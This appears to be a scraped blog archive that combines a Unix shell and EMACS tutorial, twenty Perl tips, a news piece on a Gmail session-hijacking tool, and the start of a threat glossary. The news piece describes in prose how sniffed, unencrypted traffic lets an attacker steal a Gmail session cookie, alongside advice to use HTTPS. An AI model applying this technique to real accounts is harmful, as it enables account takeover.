The "ln" command can be used to link a new name to an i-node. The format is "ln old-name new-name". Note that it is perfectly possible for the two names to be in different directories. So you and your friend could share a file by using the "ln" command to create a second link to it. Note that the ownership information is part of the i-node. So the one that created the file initially would still own it. But it would appear identically in both of your directories. The file will continue to exist until both of you delete it. That is, the "rm" command really only removes the link from a name to an i-node. The i-node goes away when there are no more links to it.<br />
<br />
There is an additional kind of link, a "symbolic link". This is a link from one name to another name, instead of from a name directly to an i-node. Suppose you wanted to make "myprog" in your directory point to your friend's version: "~smith/myprog". You could of course say "ln ~smith/myprog myprog". However if your friend ever deleted myprog and created a new one, your link would continue to point to the same i-node, namely the old file. So you might prefer to use a symbolic link: "ln -s ~smith/myprog myprog". This says that myprog in your directory is linked to ~smith/myprog, whatever it may happen to be at the moment. That is, instead of being linked to a particular physical file, it is linked to the name. Most people do not use symbolic links. A normal link (technically called a "hard link") will normally do the right thing. There are special provisions in the editors so that when you edit a file that has more than one link, all of the links are maintained. But there are some situations where a symbolic link may make sense.<br />
<br />
Unless you are a super-user, you can't create a hard link between two directories. So one of the more common uses of symbolic links is for directories. Suppose you have a friend who is working with you on files in the directory /ug/u2/smith/cs431/source. You may not want to type all of that every time you want to access one of his files. So you might do "ln -s /ug/u2/smith/cs431/source smith". Then if you refer to "smith/foo" you will really get "/u2/smith/cs431/source/foo".<br />
<br />
The Shell<br />
The commands that you type to the system are processed by a program called the "shell". The shell reads your command, and then calls a program to execute it. The shell can't do very much on its own. But it is an expert at coordinating other programs. There are several different shells used on Unix. They all understand the same basic commands, but they have different additional features. The shell that we use at Rutgers is an extended version of the C Shell, called tcsh. Users from Bell Labs or ATT may be used to the Bourne shell, or an extended version called ksh. If you want to use that, you can use the command "chsh yourname /bin/sh". chsh changes your default shell.<br />
<br />
You will normally be talking to the "top-level" shell, that is the shell that is created when you log in. However some programs have commands that create another shell. You would normally use one of these commands if you are in the middle of something and suddenly need to do an "ls" or some other command. When you are in one of these subsidiary shells, the "exit" command will get you back to the program that called the shell. If you have not set ignoreeof, ^D will also exit from a shell.<br />
<br />
Normally what you type to the shell is the name of a program followed by arguments. For example, when you type the command "rm *.p" (which deletes all files ending in .p), this is really a request to run the program "rm". Normally, the shell looks on your own directory first to see whether you have a program called "rm". If not, it then looks on a set of system directories where commands are normally kept. That allows you to create your own version of commands, which you will get instead of the normal ones. If you want to execute a program from someone else's directory, you can give a name that specifies the directory, e.g. "/fac/u1/hedrick/rm *.p" would run a program from the directory "/fac/u1/hedrick". The exact list of directories where the shell looks is defined by a variable called your "path". To change it, you can use a command such as<br />
<br />
set path = (. /usr/local/bin /usr/ucb /usr/bin /bin /etc)<br />
<br />
"." means the current directory.<br />
<br />
The shell processes the wildcards, * and ?. So if you type a command such as "rm *.p", the shell looks in your directory for all files ending in ".p". It then run the program "rm", passing it an actual list of files, such as "lastprog.p prog1.p prog2.p". Thus means that individual programs don't have to have special provisions to deal with wildcards.<br />
<br />
You can tell the shell to direct a program's primary input and output to something other than the terminal. This can be useful in case you want to put output in a file. For example, suppose you want to put a list of your files into "filelist". You could use the command<br />
<br />
ls >filelist<br />
<br />
The ">filelist" tells the shell to redirect the output from the "ls" program to the file "filelist". You can also redirect input, by using <.
You can direct one program's primary output directly into another program's primary input. (The device used for doing this is called a "pipe".) For example, suppose you have so many files that the "ls" command fills up your screen 3 times. You might do the following:
ls | more
This directs the output from "ls" into the program "more". More is a program that prints its input, stopping every N lines (where N is the length of your terminal screen). You can construct long chains of programs in this way, e.g.
ls | sort | more
which passes output from "ls" through "sort", and then to "more".
Many commands let you specify options. Normally options begin with a "-". For example, the "ls" command has options "-l" (long form listing) and "-t" (sort in order of creation time). You normally put options before any other arguments. Thus the following commands would be legal:
ls -l
ls -l *.p
There are two different ways of specifying more than one option. Either you can specify the options separately, e.g. "-l -t", or you can combine them into a single option "-lt". Many commands accept either one. However you may run into occasional commands that require one or the other syntax. The documentation for each command describes the exact syntax that it is prepared to accept.
The following sections describe some more sophisticated features of the C shell. You may not want to read them the first time through. If not, skip to the next chapter.
Job control
The C shell allows you to run and keep track of more than one process at a time. For reasons known only to the folks at Berkeley, the processes running under control of the shell are known as "jobs". This terminology is potentially confusing, since the term job is more commonly used to refer to an entire session, i.e. to everything that you are doing.
When you type a normal command, the shell starts the program you have requested, and waits until it is finished. If this were the only tool available to you, you could only do one thing at a time. You can interrupt a process by typing ^C, but this kills the process. So this still doesn't let you do more than one thing at a time.
The first, and most common, way to do more than one thing is to put a "&" at the end of a command. E.g. suppose you want to get a list of all the files on your directories, and you don't want to wait for this to finish. You might type
ls -R >files &<br />
<br />
The & specifies that the shell should start the command but not wait for it to finish. You can now issue more commands, and forget that the "ls" is still happening. A program that is running this way is "in the background". That is, it does not interfere with anything else you might be doing.<br />
<br />
There is some question about what should happen to the terminal when a background job is running. In the example I just showed, the "ls" command sent its output to a file. But suppose you did "ls -R &". This command would still run in the background, and you could still proceed to do other things, but all the output from the command would come to the terminal. Since "ls" produces output continuously, it wouldn't be very practical for you to try to do anything else while it was running. The situation is even more interesting if the program reads from the terminal. Suppose a background program tries to read from the terminal at the same time that the shell is waiting for a command. You would have no way to know where your input is going to go. For this reason, the system will normally stop a background program when it tries to read from the terminal. The assumption is that you will eventually notice that the program is waiting for input, and will continue it as a normal "foreground" program.<br />
<br />
The other way to get more than one thing happening at a time is the ^Z command. This stops the currently running job. But unlike ^C, it leaves the job around. You will be able to continue it later. Suppose you are typing a mail message and realize that you have to look something up in order to include it in the message. You can type ^Z. This will stop the mail program, but leave it around. You then look at whatever you need. You can come back to the mail program by typing "%mail". You can also continue a job in the background by doing "%name &". In the case of mail that wouldn't be too useful, since mail is going to need input from the terminal. But some programs ask a few questions and then go off and compute. In that case, you might run the program, answer the questions, and then type ^Z followed by "%name &" to get it into the background.<br />
<br />
Before you can really use all of these commands, you need to know how to refer to a job. To get the terminology straight, let's start by looking at the output of the command "jobs":<br />
<br />
geneva> jobs<br />
[1] Running ls -R /<br />
[2] - Stopped mail hedrick<br />
[3] + Stopped emacs<br />
<br />
Here we see a situation where there are 2 jobs stopped by ^Z and one running in the background. (It must be in the background, since otherwise I couldn't ever have typed the "jobs" command.) There are four different ways to refer to one of these jobs:<br />
<br />
by job number:<br />
in this case %1, %2 or %3. A % is always used to indicate this type of notation. <br />
by job name:<br />
This is the name of the program that is running, again with a %. So the job names would be %ls, %mail, and %emacs. <br />
by system-wide process id:<br />
You would have to do a "ps" command to find out the pid for these processes. Even then, it wouldn't be all that useful, since only certain commands (most commonly, the "kill" command) take pids as arguments. <br />
by default:<br />
Some of the commands default to the "current job". This is the one with the + next to it. The - is the previous job. This would become current if the current one finishes. <br />
<br />
There are actually two different ways to continue a job. You can simply use the job name as a command, e.g. "%3" or "%emacs". Or you can use the "fg" or "bg" commands, which continue a specified job in the foreground or the background. "fg" and "bg" default to the current job. If you have just stopped a job, "fg" is probably the most convenient way to continue it, since you don't have to think about what to call it. But if you want to continue some previous job, it is probably easier to type a command like "%emacs", rather than "fg %emacs".<br />
<br />
Two other useful commands commands that deal with processes are "kill" and "stop". Both of these allow either %name or %number. Kill also allows a system-wide pid. In general, kill is equivalent to ^C. That is, it gets rid of a job permanently. You would normally use it to kill a job that is stopped or running in the background. (If the job is running normally, you would just type ^C.) Some programs will trap the kill command. If you want to get rid of them, you have to use "kill -9", e.g. "kill -9 %emacs". This can be slightly dangerous. Normally processes trap a kill because they want to be able to clean up after themselves. If you use kill -9, they may leave temporary files lying around, etc.<br />
<br />
The stop command is equivalent to ^Z. You would normally use it for a job that is running in the background. (It wouldn't make any sense for a job that is already stopped, and for a normal job, you would just type ^Z.)<br />
<br />
Using the Documentation and Help Facilities<br />
Man Pages<br />
Unix has fairly complete documentation online. That is, for each command or program, there is supposed to be a "manual page" that describes it. To access these manual pages, you use the "man" command. For example, "man ls" prints the manual page describing the "ls" command.<br />
<br />
In order to use the man command, there are some things you should know. First, for substantial programs, the manual pages are not complete. The intent is that they should tell you how to run things, but they should be short enough to read on your terminal. So "man pascal" will tell you how to run the Pascal compiler, and list all of the options. But it will not print out a complete Pascal language reference manual. There are separate manuals for the languages, the mail system, the document processors, and certain other complex pieces of software. Generally the manual page will refer to this separate documentation if it exists. Larger documents are normally put in the directory /usr/doc.<br />
<br />
Second, the manual pages are organized into chapters. It is sometimes helpful to know what the chapters mean. For example if you ask "apropos" what documentation there is on "unlink" it will offer you man pages from sections 2 and 3. It is useful to know that section 2 is system calls and section 3 is subroutines. So if you were looking for the Fortran subroutine, you would want the one in section 3. Here are the chapters:<br />
<br />
1:<br />
Commands <br />
2:<br />
System calls <br />
3:<br />
Subroutines <br />
4:<br />
File formats and conventions <br />
5:<br />
Miscellaneous documentation <br />
6:<br />
Games and demos <br />
7:<br />
Special files (i.e. devices) <br />
8:<br />
Items of interest to system managers (under Solaris this is in section 1m) <br />
9:<br />
Device drivers (Solaris only) <br />
<br />
So if you are looking for commands and programs, you will only be interested in documentation from section 1.<br />
<br />
Note that Berkeley and System V used different numbering conventions, and this difference has carried over to Solaris. Solaris has additional suffixes for sections 1, 3, 4, 7, and 9. For example, section 1 has the following subsections under Solaris:<br />
<br />
1b:<br />
Berkeley compatibility commands <br />
1c:<br />
commands related to UUCP <br />
1f:<br />
commands related to FMLI <br />
1m:<br />
administrative commands <br />
1s:<br />
system development commands (seems to contain only "make") <br />
<br />
Section 3 has many subsections. Here are some of the more useful:<br />
<br />
3f:<br />
Fortran library <br />
3m:<br />
Math library <br />
3n:<br />
Internet network library <br />
3s:<br />
C standard I/O routines <br />
3x:<br />
other libraries <br />
<br />
If you want to get an overview of what is in a given section, you can use a command like "man 3 intro", which will print the introduction to chapter 3.<br />
<br />
You can get an overview of one of these subsections by typing a command like "man 3f intro".<br />
<br />
The "man" command is useful for finding a description when you know what something is called. But suppose you want to remove a file, but you can't remember the name of the command that does that. The "man" command can't help you, because you don't know what to look up. "apropos" is designed for these situations. apropos searches an index containing the titles of all the man pages. It prints all title lines containing its argument. So "apropos remove" would print all title lines that contain the word "remove". Generally the title lines are written so that they contain most of the keywords people would use for looking them up. Of course you do still need to know something about Unix terminology. (E.g. you have to know to look for "remove" instead of "delete".)<br />
<br />
By a judicious combination of "apropos" and "man", you should be able to find anything you want to about the system. What these will not do is give you overall system conventions, and the context you need to make sense out of these pages. (That is what this document is for.)<br />
<br />
Full Documentation<br />
The man pages are intended to be fairly brief documents, that can be read on a terminal. There are also full-scale reference manuals describing the system and most of its software.<br />
<br />
Many people it helpful to buy books about Unix or some Unix programs. Several local bookstores now carry a good collection of computer books (e.g. Borders). The publisher O'Reilly is particularly known for producing good books about Unix and Unix-related topics. If you want to learn how to write programs for X, their books are almost essential. They also publish detailed manuals about many topics related to system administration. However we don't know of anything that's good for just teaching you how to use Unix and debug programs. (That's why I've spent the time to write these handouts.) This set of online documents, plus the man pages, may be all you need as a general introduction. For complete novices, we sometimes recommend "Unix for Dummies". However it spends much of its time describing files and other basic concepts. People who have gone through the first semester computer science course shouldn't need it.<br />
<br />
Editors: Creating and Changing Files<br />
When you want to create a new program or change an existing one, you will use an editor. An editor is a program that reads in a file, lets you modify it, and then writes out an updated copy of it. The editors that we use are "full-screen" editors. This means that they display a piece of your file on the screen. In order to change or add to the file, you move the cursor around the screen until it is pointing to the place where you want to make the change. Then you use editor commands to delete and/or insert things. The changes that you make show up immediately on the screen. Of course it is also possible to move the "window", i.e. to change which portion of the file is showing on your screen.<br />
<br />
When you are in an editor, you are actually working with a copy of the file. That is, the changes that you make do not show up in the file itself, but rather in a copy of that file that the editor maintains in memory. When you are satisfied with your changes, you instruct the editor to make the changes in the permanent copy of the file. Sometimes something horrible will happen while you are editing. If you want to forget all of your changes, you can exit from the editor without writing the changes back into the file. In this case, the file will not be changed at all.<br />
<br />
Editors are very different in their commands from the rest of Unix. In most programs, commands are words or abbreviations. They are designed to be easy to remember and read. However in an editor, commands are usually single characters. Initially, this makes most editors look somewhat cryptic. However there is a good reason. You will be using the editor so much that you would quickly become tired of long commands. For example, if you want to move the cursor down 4 lines, it is very easy to hit the downarrow key 4 times. How would you like to have to type the word "down" 4 times? Normally commands are typed "in the dark". That is, you don't see the command on the screen as you are typing. Instead, you see its effect. For example, when you type a delete command, the character you are deleting disappears from the screen. You don't see the delete command itself.<br />
<br />
Most of our users will use the editor EMACS. So the following section describes it in more detail. There are several other text editors available on the system. You can use any of them that you prefer. One advantage of EMACS is that it is available on almost every system at the University. It is also available for most common PC operating systems.<br />
<br />
EMACS<br />
To edit a file using EMACS, just type "emacs filename". This works whether the file exists or not. If the file does not exist, it will be created the first time you use a command that updates the file.<br />
<br />
You may get an error message "emacs: terminal "xxx" isn't powerful enough to run Emacs." Normally this means that the system does not know what kind of terminal you are using, or the type you have specified is not known. This probably means that you specified the wrong thing when you logged in. Try the command "echo $TERM" to see what the system thinks your terminal type is. You can change it to another type by using "set term", e.g. "set term = vt100".<br />
<br />
The best introduction to EMACS is the EMACS tutorial program, "teach-emacs". To enter the tutorial, type the command "teach-emacs" from Unix command level. The following sections will give you a quick introduction, which should be enough to let you do some useful work.<br />
<br />
In EMACS, there is no distinction between "command mode" and "insert mode", as there is in most editors. Whenever you type a normal printable character, it is inserted in the file immediately. The commands are all control characters or something equally unusual. Since you normally don't want to put control characters into your text, it is easy enough to tell what things are commands and what are text that you want to go into your file. So in EMACS, to add some new text, you just get to the right place and start typing. To execute a command, just type it.<br />
<br />
As it turns out, there weren't enough different control characters to satisfy the designers of EMACS. They wanted more commands. So there are also some prefix characters that are used to make up 2-character commands. The most common ones are "escape" and "^x". "escape" following by anything is a command. So is "^x" followed by anything. (Escape is a special key, normally labelled "ESCAPE" or "ESC". On some older terminals it is labelled "ALTMODE" or "ALT".) Actually escape has one other use: escape followed by a number sets up a count for the next command. For example, "^d" deletes the next character. "escape 5 ^d" deletes the next 5 characters. [It's hard to write these key sequences. "escape 5 ^d" represents three keypresses: escape, 5, and control-d.]<br />
<br />
The most common commands are put on a separate "keypad". This is a special set of keys to the right of the normal keyboard. On most of our terminals, the keys are labelled with the digits, and look like the keyboard of a desk calculator. When you use them in EMACS, you should ignore the labels. The most important keys are used to move the cursor around the screen.<br />
<br />
what they do how they are labelled<br />
<br />
up 8<br />
<br />
left right 4 6<br />
<br />
down 2<br />
<br />
Here are enough other commands to get you started doing useful work.<br />
<br />
^v<br />
move forward a screenful <br />
escape v<br />
move back a screenful <br />
^s<br />
search for a specified string; asks for string <br />
^d<br />
delete a character <br />
rubout<br />
delete previous character <br />
^k<br />
kill (delete) the rest of the current line <br />
^a<br />
go to the beginning of the line <br />
^e<br />
go to the end of the line <br />
escape <
go to the beginning of the file
escape ><br />
go to the end of the file <br />
^o<br />
open up a new line <br />
^y<br />
put back the most recently deleted lines <br />
^x^s<br />
make the changes in the file <br />
^x^c<br />
exit <br />
<br />
It is probably useful to give some additional information about some of these commands. There are two reasonable ways to add a new line. One is to go to the end of the line before the place where you want to put it and hit the carriage return to create the new line. The other is to go to the beginning of the line after it and hit "^o". In either case, the cursor will be left on the new line, ready for you to type in new text.<br />
<br />
^k has a somewhat odd but useful definition. If you are in the middle of a line, it deletes the rest of the line. If you are at the end of the line, it deletes the newline at the end. That is, it joins the next line to the end of the current one. If you want to kill the whole line, this means that you should get to the beginning of it and do "^k" twice. The first time clears the line. The second time gets rid of the newline at the end.<br />
<br />
^k can be used with ^y to move text around. When you kill lines with ^k, they are remembered in a "kill buffer". You can then to somewhere else and do ^y. This will cause the lines that you killed to be resurrected at the current location. You can put the same lines several places by doing ^y in several places. NB: If you do a few ^k's, then move the cursor, then do a few more ^k's, only the last set of lines killed will be in the kill buffer. Of course if you know how many lines you want to move, it is easier to do "escape 5 ^k" than ^k 10 times. (10 times because you have to type ^k twice to kill a single line.)<br />
<br />
To exit from EMACS, first write out the updated version of the file by typing "^x^s", and then leave by typing "^x^c".<br />
<br />
EMACS protects you against various kinds of disaster by keeping backup copies of your file. These have the same name as the original file, with .BCK or .CKP added to the end. If may find it a good idea to do "rm *.BCK *.CKP" now and then.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-16279836912467093902010-01-12T22:00:00.000-08:002010-01-12T22:00:08.317-08:0020 Killer Perl Programming Tips for Beginners on UNIX / Linux OS<b>20 Killer Perl Programming Tips for Beginners on UNIX / Linux OS</b><br />
<br />
If you are a Linux sysadmin who writes occasional perl code (or) a developer who wants to learn perl program language, these 20 basic perl programming tips and tricks explained in this article will give you a jumpstart.<br />
<br />
<br />
1. List all Installed Perl Modules from Unix Command Line<br />
<br />
Get a list of all installed perl modules as shown below.<br />
<br />
$ perl -MFile::Find=find -MFile::Spec::Functions -Tlw -e 'find { wanted => sub { print canonpath $_ if /\.pm\z/ }, no_chdir => 1 }, @INC'<br />
<br />
/usr/lib/perl5/vendor_perl/5.8.8/i386-linux-thread-multi/HTML/Filter.pm<br />
/usr/lib/perl5/vendor_perl/5.8.8/i386-linux-thread-multi/HTML/LinkExtor.pm<br />
/usr/lib/perl5/vendor_perl/5.8.8/i386-linux-thread-multi/HTML/PullParser.pm<br />
/usr/lib/perl5/vendor_perl/5.8.8/i386-linux-thread-multi/HTML/Parser.pm<br />
/usr/lib/perl5/vendor_perl/5.8.8/i386-linux-thread-multi/HTML/TokeParser.pm<br />
.....<br />
In the above example,<br />
<br />
File::Find and File::Spec::Functions module are used to list all installed modules.<br />
-M option loads the module. It executes use module before executing the script<br />
-T option enables taint checking, which instructs perl to keep track of data from the user and avoid doing anything insecure with it. Here this option is used to avoid taking the current directory name from the @INC variable and listing the available .pm files from the directory recursively.<br />
-l option enables automatic line-ending processing in the output. Print statements will have the new line separator (\n) added at the end of each line.<br />
-w option prints any warning messages.<br />
-e option indicates that the following string is to be interpreted as a perl script (i.e., sequence of commands).<br />
2. List all Installed Perl Modules from a perl script (Using ExtUtils::Installed package)<br />
<br />
Use the following perl code snippet to get a list of installed perl modules.<br />
<br />
my $Inst = ExtUtils::Installed->new();<br />
my @Modules = $Inst->modules();<br />
print "Current List of Installed PERL Modules:\n\n";<br />
foreach my $mod(@Modules){<br />
print "$mod\n";<br />
}<br />
Note: The module ExtUtils::Installed is not pre-installed with perl program. So you should install it from cpan.<br />
<br />
3. List Perl Modules Using Perldoc Command<br />
<br />
perldoc perlmodlib lists all the modules that comes pre-installed with the perl program.<br />
<br />
$ perldoc perlmodlib<br />
<br />
Attribute::Handlers Simpler definition of attribute handlers<br />
AutoLoader Load subroutines only on demand<br />
.........<br />
Note: You can also use ‘perldoc perllocal’ command to identify additional perl modules that are installed.<br />
<br />
$ perldoc perllocal<br />
perldoc perllocal command lists all optional modules installed in the system with the following information:<br />
<br />
Installation date<br />
Directory location of where the perl module is installed<br />
Perl Module version number<br />
etc.,<br />
4. View Perl Documentation From Unix Command Line<br />
<br />
You can use either perldoc or man command to get help about a particular perl module as shown below.<br />
<br />
$ perldoc Regexp::Common<br />
<br />
(or)<br />
<br />
$ man Regexp::Common<br />
If the perl document is not enough, use perldoc option -m, to view both source code and unformatted pod documentation of the specified perl module.<br />
<br />
$ perldoc -m Regexp::Common<br />
To view documentation on a specific perl function, use the option -f, as shown below.<br />
<br />
$ perldoc -f splice<br />
5. View Online Perl Documentation (or Download it for Offline Use)<br />
<br />
Lot of excellent perl tutorials are available online at Perl programming documentation.<br />
<br />
From this website, you can also download the HTML or PDF version of the perl documentation for offline viewing.<br />
<br />
Full version (contains HTML and PDF files) – perldoc.tar.gz<br />
Lite version (contains HTML files only) – perldoc-html.tar.gz<br />
6. Read Perl Documentation Using Podbrowser<br />
<br />
Download the podbrowser. You can browse the installed perl modules, functions, and perl documentation visually from the podbrowser. From their website:<br />
<br />
PodBrowser is a documentation browser for Perl.<br />
You can view, search and print documentation for Perl's<br />
builtin functions, its "perldoc" pages, pragmatic modules<br />
and the default and user-installed modules.<br />
Note: You can also use Vim editor as Perl-IDE as we discussed earlier.<br />
<br />
7. Modify CPAN Module Configuration Manually<br />
<br />
To install the perl modules from Linux command line, use CPAN. We discussed earlier about how to install perl modules — both manually and using CPAN command.<br />
<br />
The first time you use the Perl module CPAN ( perl -MCPAN ), a script is executed to configure several options. For example, it configures the location of tar, gzip and unzip files, the cache size for the build directory, source file location etc.,<br />
<br />
To reconfigure CPAN module configuration files manually you can edit one of the following files.<br />
<br />
~/.cpan/CPAN/MyConfig.pm – User specific Perl CPAN Configuration file<br />
/etc/perl/CPAN/Config.pm – System-wide Perl CPAN Configuration file is stored somewhere in the perl module directory tree.<br />
$ vim ~/.cpan/CPAN/MyConfig.pm<br />
<br />
(and / or)<br />
<br />
$ vim /etc/perl/CPAN/Config.pm<br />
8. Modify CPAN Module Configurations Interactively<br />
<br />
Launch the cpan shell as shown below and execute o conf init, which will ask “are you ready for manual configure”, give your option ( Yes / No ) to continue. This will list all the configuration parameters along with it’s value.<br />
<br />
$ perl -MCPAN -e shell<br />
<br />
cpan> o conf init<br />
<br />
cpan> o conf<br />
9. Verify if a Perl Module is Installed<br />
<br />
If you like to know whether a perl module (for example, Regexp::Common) is installed, execute the following command. If you get “1″ as the output, then the specified perl module is installed. If not, you’ll get the error message as shown below.<br />
<br />
$ perl -MRegexp::Common -le 'print 1'<br />
<br />
Can't locate Regexp/Common.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.8.8 /usr/local/share/perl/5.8.8 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.8 /usr/share/perl/5.8 /usr/local/lib/site_perl .).<br />
Note: You can also check if perl module is installed using perldoc or man command. If the perl module is installed the manual page of the module will open successfully. If not, it will say “no manual / documentation found for this module”<br />
<br />
$ perldoc Regexp::Common<br />
<br />
$ man Regexp::Common<br />
10. List the Directories Where Perl Modules are Located<br />
<br />
The perl array @INC contains the list of places that the ‘do EXPR’, ‘require’, or ‘use’ constructs look for their library files. The following one-liner shows the contents of the @INC perl array:<br />
<br />
$ perl -e 'foreach $folder (@INC) { print "$folder\n";}'<br />
11. Check the Version of an Installed Perl Module<br />
<br />
To check the version number of a module use the following command.<br />
<br />
#-- check the version number of CGI module<br />
$ perl -MCGI -e 'print "$CGI::VERSION \n"'<br />
<br />
#-- check the version number of Regexp::Common module<br />
$ perl -MRegexp::Common -e 'print "$Regexp::Common::VERSION \n"'<br />
Note: Also, make sure to read our review about the Perl Best Practices book.<br />
<br />
12. Specify the Minimum Perl Module Version to Use<br />
<br />
Sometimes you might want to use a specific version of a perl module in your program. To avoid using earlier version of that module, append the minimum version number you want in the use ‘module’ statement as shown below.<br />
<br />
#-- Use version 5.8 of later of module LWP<br />
use LWP 5.8<br />
Note: Your perl program will exit with an appropriate error message if the installed module version is lower than the version you specified in the use command.<br />
<br />
13. Useful Perl Modules to Develop Web Applications<br />
<br />
If you are developing web application, you might want to consider using the following perl modules.<br />
<br />
CGI – General purpose module for creating web pages<br />
Template – Template Toolkit to generating dynamic web content<br />
LWP – LWP is used to fetch web contents<br />
WWW::Mechanize – Use this to automate interaction with a website<br />
14. Determine the Operating System the Perl Script is Running Under<br />
<br />
The name of the underlying operating system is stored in the variable $^O. Following are some of the common $^O value<br />
<br />
linux – Linux<br />
MSWin32 – Windows<br />
aix – AIX<br />
solaris – Solaris<br />
Note: The value stored in $^O contains only the name of the operating system, not the release number. To determine the release number, consider using POSIX::uname() from POSIX package.<br />
<br />
15. Define Constant Values Inside Perl Script<br />
<br />
The best way to define constant values is to use Perl Readonly or Constant module as shown below.<br />
<br />
use Readonly;<br />
Readonly my $PI => 3.1415926535;<br />
<br />
(or)<br />
<br />
use Constant PI => 3.1415926535;<br />
Please note the following:<br />
<br />
Using Readonly module you can define Readonly scalars, hashes and arrays.<br />
If you try to modify a Readonly variable, the program will die.<br />
16. Determine the OS User and/or OS Group Running a Perl Script<br />
<br />
Use the following predefined variables to get the user and group information of the current process:<br />
<br />
$< – real user id (uid); unique value
$> – effective user id (euid); unique value<br />
$( – real group id (gid); list (separated by spaces) of groups<br />
$) – effective group id (egid); list (separated by spaces) of groups<br />
Please note the following:<br />
<br />
This information applies only to Unix systems<br />
The values that theses variables hold are integers.<br />
To get the user and group names, use ‘(getpwuid($<))[0]‘ (for user information) and ‘getgrgid($()’ (for groups).
17. Executing External Commands
There are many ways to execute external commands from Perl as explained below.
system() – you want to execute a command and don’t want to capture its output
exec – you don’t want to return to the calling perl script
backticks – you want to capture the output of the command
open - you want to pipe the command (as input or output) to your perl script
18. Parse Plain Messy Perl Script Using B::Deparse
Got a chunk of obfuscated or just plain messy and hard to read Perl code? The B::Deparse module may be able to help. It compiles, then decompiles the program it is given, expanding it out and formatting it nicely. It removes the comment lines written in the perl program.
To run it at the command line, type “perl -MO=Deparse prog.pl”. Here is an example of its usage,
First create the input program:
$ cat scary.pl
for(74,117,115,116){$::a.=chr};(($_.='qwertyui')&&
(tr/yuiqwert/her anot/))for($::b);for($::c){$_.=$^X;
/(p.{2}l)/;$_=$1}$::b=~/(..)$/;print("$::a$::b $::c hack$1.");
Pass the perl script scary.pl to the Deparse module
$ perl -MO=Deparse scary.pl
foreach $_ (74, 117, 115, 116) {
$a .= chr $_;
}
;
$_ .= 'qwertyui' and tr/eiqrtuwy/nr oteah/ foreach ($b);
foreach $_ ($c) {
$_ .= $^X;
/(p.{2}l)/;
$_ = $1;
}
$b =~ /(..)$/;
print "$a$b $c hack$1.";
scary.pl syntax OK
19. List Installed DBI Drivers
DBI is the standard database interface module for Perl. The following Perl program prints a list of all installed DBI drivers.
use strict;
use warnings;
use DBI;
print map "$_\n",DBI->available_drivers;<br />
Example output of the above program:<br />
<br />
DBM<br />
ExampleP<br />
File<br />
Proxy<br />
Sponge<br />
mysql<br />
If the driver you require is not installed, use CPAN to find the right DBD (database driver) module.<br />
<br />
20. Regular expression special variable<br />
<br />
One of the most useful feature or the most powerful string manipulation facility in perl is regular expression.<br />
<br />
At heart of this is the regular expression which is shared by many other UNIX utilities.<br />
Perl has a host of special variables that get filled after every m// or s/// regex match.<br />
<br />
$1, $2, $3, etc. hold the backreferences.<br />
$+ holds the last (highest-numbered) backreference.<br />
$& (dollar ampersand) holds the entire regex match.<br />
$’ (dollar followed by an apostrophe or single quote) holds the part of the string after (to the right of) the regex match.<br />
$` (dollar backtick) holds the part of the string before (to the left of) the regex match.<br />
Using these variables is not recommended in perl scripts when performance matters, as it causes Perl to slow down all regex matches in your entire perl script.<br />
<br />
All these variables are read-only, and persist until the next regex match is attempted.<br />
Example<br />
<br />
$string = "This is the geek stuff article for perl learner";<br />
$string =~ /the (g.*) stuff(.*) /;<br />
print "Matched String=>$&\nBefore Match=>$`\nAfter Match=>$'\nLast Paren=>$+\nFirst Paren=>$1\n";<br />
Output of the above example :<br />
<br />
Matched String=>the geek stuff article for perl<br />
Before Match=>This is<br />
After Match=>learner<br />
Last Paren=> article for perl<br />
First Paren=>geekUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-89812722029603884102010-01-08T03:10:00.001-08:002010-01-08T03:10:25.859-08:00<b>Gmail Account Hacking Tool</b><br />
<br />
A tool that automatically steals IDs of non-encrypted sessions and breaks into Google Mail accounts has been presented at the Deacon hackers’ conference in Las Vegas.<br />
Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed the tool is planning to release it in two weeks.<br />
When you log in to Gmail the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually hit the sign out button. When you hit sign out this cookie is cleared.<br />
Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done. According to Google this behavior was chosen because of low-bandwidth users, as SLL connections are slower.<br />
The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for an attacker sniffing traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. Once this happens the attacker can log in to the account without the need of a password. People checking their e-mail from public wireless hotspots are obviously more likely to get attacked than the ones using secure wired networks. Todd Mumford, from the SEO Company called SEO Visions Inc, states “This can be a serious problem for Internet Marketers who travel often and use their wireless laptops and Gmail services often and do not always have access to a secure connection”<br />
Perry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.”<br />
If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-79512273179771552562010-01-08T03:06:00.000-08:002010-01-08T03:06:06.260-08:00<b>Glossary of Computer Threat Terms</b><br />
<br />
A B C D E F G H I J K L M N O P R S T U V W Z<br />
<br />
<br />
This suffix is often attached to a virus' name to indicate the virus is a slow mailer. An important distinction, in terms of threat assessment, is made between slow mailers (which send one 'infected' message at a time or occasionally send small batches of infected messages) and mass mailers. <br />
<br />
This suffix is often attached to a virus' name to indicate a virus that distributes itself from victim machines via mass mailing. An important distinction, in terms of threat assessment, is made between mass mailers (which send large numbers of infected messages at once) and slow mailers (also see @m). <br />
Return to top<br />
<br />
<br />
<b> A </b><br />
<br />
Adware or Ad ware<br />
Software that downloads and displays advertisements. This kind of software is often bundled with Freeware. The software license may say that by installing the software you agree to accept advertising. See also Spy ware or Spyware.<br />
Alias<br />
